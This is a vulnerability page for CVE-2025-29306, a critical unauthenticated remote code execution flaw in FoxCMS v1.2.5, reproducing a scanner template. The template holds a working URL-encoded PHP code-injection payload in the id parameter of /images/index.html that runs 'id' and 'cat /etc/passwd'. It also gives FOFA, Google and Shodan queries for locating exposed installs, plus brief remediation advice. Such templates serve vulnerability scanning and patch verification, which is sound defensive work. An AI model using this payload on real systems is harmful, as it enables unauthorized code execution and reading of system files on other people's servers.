漏洞描述
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
CVE-2025-29306: FoxCMS v.1.2.5 - Remote Code Execution
PoC代码[已公开]
id: CVE-2025-29306
info:
name: FoxCMS v.1.2.5 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
remediation: |
Update to the latest version of FOXCMS if available. If no patch is available,implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' parameter values.
reference:
- https://github.com/verylazytech/CVE-2025-29306/blob/main/CVE-2025-29306.sh
- https://medium.com/@verylazytech
- https://nvd.nist.gov/vuln/detail/CVE-2025-29306
classification:
epss-score: 0.78993
epss-percentile: 0.9903
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-29306
cwe-id: CWE-94
metadata:
verified: true
max-request: 1
fofa-query: (body="foxcms-logo" || body="foxcms-container") && body="div"
google-query: intitle:"FOXCMS" intext:"foxcms-logo"
shodan-query: html:"foxcms-logo"
tags: cve,cve2025,rce,foxcms,unauth,oast,vkev
http:
- method: GET
path:
- "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
payloads:
command:
- "id"
- "cat /etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
- "root:.*:0:0:"
condition: or
- type: word
part: body
words:
- "foxcms"
case-insensitive: true
- type: status
status:
- 200
# digest: 490a00463044022014e37fc0d7079d2cca068c229cef5e0ba0d6386ea3f8355955cab7379cf20bdb022008b1bde821754da0b99257357dfd712a0ec18b0688a613b13745fa7b7af6011d:922c64590222798bb761d5b6d8e72950